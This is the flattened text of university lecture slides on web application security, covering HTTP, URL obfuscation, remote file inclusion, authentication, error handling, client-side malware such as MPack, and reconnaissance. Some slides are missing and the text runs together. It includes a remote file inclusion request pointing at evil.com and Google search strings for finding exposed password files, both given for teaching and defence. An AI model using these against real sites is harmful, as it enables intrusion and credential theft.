Introduction

CSC 482/582: Computer SecurityWeb SecurityCSC 482/582: Computer SecuritySlide #1CSC 482/582: Computer SecuritySlide #2TopicsWhy web application security?HTTP and web input typesWeb Application VulnerabilitiesClient-side AttacksFinding Web VulnerabilitiesWhy Web Application Security?

CSC 482/582: Computer SecuritySlide #3Why Web Application Security?

CSC 482/582: Computer SecuritySlide #4

CSC 482/582: Computer SecuritySlide #5Web TransactionsWeb BrowserOSWeb ServerNetworkHTTP RequestHTTP Response5CSC 482/582: Computer SecuritySlide #6HTTP: HyperText Transfer ProtocolSimple request/respond protocolRequest methods: GET, POST, HEAD, etc.Protocol versions: 1.0, 1.1StatelessEach request independent of previous requests, i.e. request #2 doesnt know you authd in #1.Applications responsible for handling state.

CSC 482/582: Computer SecuritySlide #7HTTP RequestGET http://www.google.com/ HTTP/1.1Host: www.google.comUser-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7Accept: text/html, image/png, */*Accept-Language: en-us,en;q=0.5Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4MethodURLProtocol VersionHeadersBlank LineNo Data for GET methodCSC 482/582: Computer SecuritySlide #8HTTP ResponseHTTP/1.1 200 OKCache-Control: privateContent-Type: text/htmlServer: GWS/2.1Date: Fri, 13 Oct 2006 03:16:30 GMT

... (page data) ... Protocol VersionHTTP Response CodeHeadersBlankLineWeb Page DataCSC 482/582: Computer SecuritySlide #9Different PerspectivesClient Side

HTTP requests may reveal private info.HTTP responses may reveal private info.HTTP responses may include malicious code (Java, ActiveX, Javascript)Server Side

HTTP requests may contain malicious input.HTTP requests may have forged authentication.HTTP responses may be intercepted.

CSC 482/582: Computer SecuritySlide #10Web-based InputClient and Server PerspectivesTypes of InputURL parametersHTMLCookiesJavascriptCross-Site ScriptingCSC 482/582: Computer SecuritySlide #11URL Format://@:/?Whitespace marks end of URL@ separates userinfo from host? marks beginning of query string& separates query parameters%HH represents character with hex valuesex: %20 represents a spacehttp://username:password@www.auth.com:8001/a%20spaced%20path11RFC 1738 for URL definitionsCSC 482/582: Computer SecuritySlide #12URL ParametersClient controls query-string Cannot limit values to those specified in formAny character can be URL-encodedEven if it doesnt need to be.Any valid format may be used to disguise true destination of URLCSC 482/582: Computer SecuritySlide #13URL ObfuscationIP address representationsDotted quad (decimal, octal, hexadecimal)Hexadecimal without dots (with left padding)dword (32-bit int)Examples: www.eecs.utoledo.edu131.183.19.14 (dotted quad)0xDEDA83B7130E (hexadecimal + padding)2209813262 (dword)13Browsers may not support all the IP address formats limited, though IE did at one time.CSC 482/582: Computer SecuritySlide #14HTML Special Characters ends a tagsome browsers will auto-insert matching

GET /include.php?server_root=http://evil.com/command.txt 24Example from The #1 Flaw in PHP Applications, http://opensource.apress.com/article/7/the-1-security-flaw-in-php-applications, 2006.

CSC 482/582: Computer SecuritySlide #25Mitigating Remote File InclusionTurn off remote file inclusion.Do not run code from uploaded files.Do not use user-supplied paths.Validate all paths before loading code.

March 4, 2009SIGCSEAuthenticationAuthentication is the process of determining a users identity.Key IdeasHTTP is a stateless protocol.Every request must be authenticated.Use username/password on first request.Use session IDs on subsequent queries.CSC 482/582: Computer SecuritySlide #27Authentication AttacksSniffing passwordsGuessing passwordsIdentity management attacksReplay attacksSession ID fixationSession ID guessingCSC 482/582: Computer SecuritySlide #28Identity Management AttacksAuth requires identity managementUser registrationPassword changes and resetsMitigationsUse CAPTCHAs to protect registration.Dont use easy to guess secret questions.Dont allow attacker to reset e-mail address that new password is sent to.CSC 482/582: Computer SecuritySlide #29Session ID GuessingDo session IDs show a pattern?How does changing username change ID?How do session IDs change with time?Brute forcing session IDsUse program to try 1000s of session IDs.Mitigating guessing attacksUse a large key space (128+ bits).Use a cryptographically random algorithm.CSC 482/582: Computer SecuritySlide #30Mitigating Authentication AttacksUse SSL to prevent sniffing attacks.Require strong passwords.Use secure identity management.Use a secure session ID mechanism.IDs chosen at random from large space.Regenerate session IDs with each request.Expire session IDs in short time.

CSC 482/582: Computer SecuritySlide #31Access ControlAccess control determines which users have access to which system resources.Levels of access controlSiteURLFunctionFunction(parameters)DataCSC 482/582: Computer SecuritySlide #32Mitigating Broken Access ControlCheck every access.Use whitelist model at every layer.Do not rely on client-level access control.Do not rely on security through obscurity.CSC 482/582: Computer SecuritySlide #33Improper Error HandlingApplications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly.Errors can provide too much dataStack tracesSQL statementsSubsystem errorsUser typos, such as passwords.CSC 482/582: Computer SecuritySlide #34Example of Improper Error HandlingmySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145)

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 12434CSC 482/582: Computer SecuritySlide #35Mitigating Improper Error HandlingCatch all exceptions.Check all error codes.Wrap application with catch-all handler.Send user-friendly message to user.Store details for debugging in log files.Dont log passwords or other sensitive data.CSC 482/582: Computer SecuritySlide #36Insecure StorageStoring sensitive data without encrypting it, or using a weak encryption algorithm, or using a strong encryption system improperly.ProblemsNot encrypting sensitive data.Using home grown cryptography.Insecure use of weak algorithms.Storing keys in code or unprotected files.CSC 482/582: Computer SecuritySlide #37Storage RecommendationsHash algorithmsMD5 and SHA1 look insecure.Use SHA256.Encrypting dataUse AES with 128-bit keys.Key generationGenerate random keys.Use secure random source.CSC 482/582: Computer SecuritySlide #38Mitigating Insecure StorageUse well studied public algorithms.Use truly random keys.Store keys in protected files.Review code to ensure that all sensitive data is being encrypted.Check database to ensure that all sensitive data is being encrypted.CSC 482/582: Computer SecuritySlide #39Insecure CommunicationApplications fail to encrypt sensitive data in transit from client to server and vice-versa.Need to protectUser authentication and session data.Sensitive data (CC numbers, SSNs)Key IdeaUse SSL for all authentication connections.CSC 482/582: Computer SecuritySlide #40Mitigating Insecure CommunicationUse SSL for all authenticated sessions.Use SSL for all sensitive data.Verify that SSL is used with automated vulnerability scanning tools.CSC 482/582: Computer SecuritySlide #41Client-side AttacksBuffer Overflow2004 iframe2004-05 jpegRemote CodeActiveXFlashJavaJavascript

41Firefox vulnerability summary: http://www.mozilla.org/projects/security/known-vulnerabilities.htmlIE vulnerability list: http://secunia.com/product/11/?task=advisoriesCSC 482/582: Computer SecuritySlide #42ActiveXExecutable code downloaded from serverActivated by HTML object tag.Native code binary format.

Security modelDigital signature authenticationZone-based access controlNo control once execution startsCSC 482/582: Computer SecuritySlide #43JavaDigital signature authenticationSandbox

Sandbox ComponentsByte-code verifierClass loaderSecurity managerSandbox LimitsCannot read/write files.Cannot start programs.Network access limited to originating host.CSC 482/582: Computer SecuritySlide #44MPack Browser MalwareUser visits site.Response contains iframe.Iframe code causes browser to make request.Request redirected to MPack server.Server identifies OS and browser, sends exploit that will work for client configuration.Exploit causes browser to send request for code.Mpack downloader sent to user, begins d/ling other malware.

44Images from http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.htmlCSC 482/582: Computer SecuritySlide #45MPackCommercial underground PHP softwareSold for $700-1000.Comes with one year technical support.Can purchase updated exploits for $50-150.Infection TechniquesHacking into websites and adding iframes.Sending HTML mail with iframes.Typo-squatting domains.Use GoogleAds to draw traffic.CSC 482/582: Computer SecuritySlide #46Client ProtectionDisable ActiveX and Java.Use NoScript to limit Javascript.Run browser with least privilege.Use a browser sandbox:VMWare Virtual Browser ApplianceProtected Mode IE (Windows Vista)Goto sites directly instead of using links.Use plain text e-mail instead of HTML.Patch your browser regularly.Use a personal firewall.CSC 482/582: Computer SecuritySlide #47Web ReconnaissanceGoogle HackingIndex of +passwdIndex of +password.txtfiletype:htaccess userallinurl:_vti_bin shtml.exe

Web Crawlingwget --mirror http://www.w3.org/ -o /mirror/w3

Santy Worm used Googleto find vulnerable servers.47http://news.com.com/Photo+Google+hack+helps+spread+Web+worm/2009-7349_3-5499736.html?tag=cd.topCSC 482/582: Computer SecuritySlide #48Proxies and Vulnerability ScannersAchillesOWASP Web ScarabParos ProxySPI Dynamics WebInspect

Web BrowserWeb ServerEdit Web Data URL Cookies Form DataWeb ProxyCSC 482/582: Computer SecuritySlide #49Achilles Proxy Screenshot

CSC 482/582: Computer SecuritySlide #50Key PointsAll input can be dangerousURLs, Cookies, Executable contentConsider both client and server security.SSL is not a panaceaConfidentiality + integrity of data in transit.Input-based attacks can be delivered via SSL.Top VulnerabilitiesCross-Site ScriptingSQL InjectionRemote File InclusionReferencesAndreu, Professional Penetration Testing for Web Applications, Wrox, 2006.Daswani et. al., Foundations of Security, Apress, 2007.Friedl, SQL Injection Attacks by Example, http://unixwiz.net/techtips/sql-injection.html, 2007.IBM, IBM X-Force 2010 Mid-Year Trend and Risk Report, http://www-935.ibm.com/services/us/iss/xforce/trendreports/, 2010.OWASP, OWASP Top 10 for 2010, http://www.owasp.org/index.php/Category:OWASP_Top_Ten_ProjectNeils Provos et. al., The Ghost in the Browser: Analysis of Web-based Malware, Hotbots 07, http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf, 2007.Samy, MySpace Worm Explanation, http://namb.la/popular/tech.html, 2005.Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, McGraw-Hill, 2006.Stuttart and Pinto, The Web Application Hackers Handbook, Wiley, 2007.CSC 482/582: Computer SecuritySlide #51